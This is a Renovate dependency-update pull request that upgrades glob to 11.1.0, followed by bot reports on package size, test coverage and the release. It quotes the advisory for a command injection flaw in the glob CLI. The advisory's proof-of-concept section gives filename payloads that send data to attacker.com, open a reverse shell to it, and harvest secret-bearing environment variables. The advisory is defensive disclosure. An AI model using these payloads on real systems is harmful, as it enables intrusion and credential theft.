fix(deps): update dependency glob to v11.1.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
glob	11.0.3 -> 11.1.0

GitHub Vulnerability Alerts

CVE-2025-64756

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

1. User runs glob -c <command> <pattern>
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using shell: true
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands

Affected Component:

• CLI Only: The vulnerability affects only the command-line interface
• Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
• Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

• Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
• Any directory where attackers can control filenames (PR branches, archives, user uploads)
• CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

• The echo command executes normally
• Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
• A new file injected_poc is created, proving command execution
• Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

• Commands execute with full privileges of the user running glob CLI
• No privilege escalation required - runs as current user
• Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

• Malicious PR adds files with crafted names to repository
• CI pipeline uses glob -c to process files (linting, testing, deployment)
• Commands execute in CI environment with build secrets and deployment credentials
• Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

• Developer clones repository or extracts archive containing malicious filenames
• Local build scripts use glob -c for file processing
• Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

• Services using glob CLI to process uploaded files or external content
• File uploads with malicious names trigger command execution
• Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

• Malicious packages or themes include files with crafted names
• Build processes using glob CLI automatically process these files
• Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

• POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
• Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
• Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

• Ecosystem: npm
• Package name: glob
• Component: CLI only (src/bin.mts)
• Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
• Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
• Patched versions: 11.1.0and 10.5.0

Scope Limitation:

• Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
• CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

• Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
• If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
• As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

---

Release Notes

isaacs/node-glob (glob)

v11.1.0

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" in timezone America/Los_Angeles, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[github-actions]

This PR will trigger a patch release when merged.

[adobe-bot]

✅ Sizewatcher found no problematic size increases.

✅ git has no changes (866 kB)

Largest files:

Largest files in repository checkout:

 302KiB package-lock.json
 182KiB src/secrets/patterns.yaml
 102KiB devflow.svg
  20KiB README.md
  19KiB src/fastly/api/fastly-api.js
  17KiB src/fastly/store.js
  11KiB LICENSE
  11KiB src/fastly/service-mgr.js
  10KiB src/test/runner.js
 9.2KiB src/fastly/fiddle-mgr.js

Largest files among new changes:

 302KiB package-lock.json
 1.9KiB package.json

✅ node_modules has no changes (163 MB)

Largest production node modules:

@adobe/edgly@1.3.9 (56 deps, 5.98mb, 945 files, ©undefined)
╭────────────────────────────┬──────────────┬──────────┬───────┬───────────┬───────────────┬───────────╮
│ Name                       │ Dependencies │     Size │ Files │ Native    │ License       │ Deprec    │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ glob@11.1.0                │           27 │   3.19mb │   369 │           │ BlueOak-1.0.0 │           │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ yaml@2.8.1                 │              │    667kb │   233 │           │ ISC           │           │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ yargs@17.7.2               │           17 │ 629.89kb │   173 │           │ MIT           │           │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ @adobe/fetch@4.2.3         │            4 │ 369.78kb │    45 │           │ Apache-2.0    │           │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ formdata-node@6.0.3        │              │ 124.64kb │    16 │           │ MIT           │           │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ chalk@5.6.2                │              │   43.3kb │    12 │           │ MIT           │           │
├────────────────────────────┼──────────────┼──────────┼───────┼───────────┼───────────────┼───────────┤
│ tiny-update-notifier@2.0.2 │            1 │  17.24kb │    14 │           │ MIT           │           │
╰────────────────────────────┴──────────────┴──────────┴───────┴───────────┴───────────────┴───────────╯

✅ npm_package has no changes (65.9 kB)

Package contents:

npm notice
📦  @adobe/edgly@1.3.9
Tarball Contents
170B COPYRIGHT
11.3kB LICENSE
20.9kB README.md
1.9kB package.json
2.3kB src/commands/fiddle/clear.js
2.0kB src/commands/fiddle/create.js
1.2kB src/commands/fiddle/fiddle.js
2.6kB src/commands/fiddle/get.js
2.2kB src/commands/fiddle/update.js
3.0kB src/commands/service/create.js
3.2kB src/commands/service/get.js
2.1kB src/commands/service/import.js
1.2kB src/commands/service/service.js
3.7kB src/commands/service/update.js
2.7kB src/commands/test.js
1.2kB src/commands/version.js
1.6kB src/config.js
19.6kB src/fastly/api/fastly-api.js
2.2kB src/fastly/api/fiddle-api.js
9.4kB src/fastly/fiddle-mgr.js
11.3kB src/fastly/service-mgr.js
3.8kB src/fastly/service.js
17.1kB src/fastly/store.js
2.6kB src/index.js
2.8kB src/opts.js
185.9kB src/secrets/patterns.yaml
9.0kB src/secrets/secrets.js
6.8kB src/test/parser.js
10.5kB src/test/runner.js
6.0kB src/util.js
6.6kB src/yargs-ahoy.js
Tarball Details
name: @adobe/edgly
version: 1.3.9
filename: adobe-edgly-1.3.9.tgz
package size: 65.9 kB
unpacked size: 357.2 kB
shasum: 7b441bbc9bb72b846e159a21b1e84b8bd3b57f3a
integrity: sha512-+jTkkAn2/b7eS[...]nB/sV21u9jMlA==
total files: 31
npm notice
npm warn This command requires you to be logged in to https://registry.npmjs.org/ (dry-run)
Publishing to https://registry.npmjs.org/ with tag latest and public access (dry-run)

Notes

• PR branch: renovate-npm-glob-vulnerability @ 82d63f6
• Base branch: main @ b96db02
• Sizewatcher v1.4.0
• Effective Configuration:

limits:
  fail: 100%
  warn: 30%
  ok: '-10%'
report:
  githubComment: true
  githubStatus: false
comparators: {}

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.

📢 Thoughts on this report? Let us know!

[adobe-bot]

🎉 This PR is included in version 1.3.10 🎉

The release is available on:

• npm package (@latest dist-tag)
• GitHub release

Your semantic-release bot 📦🚀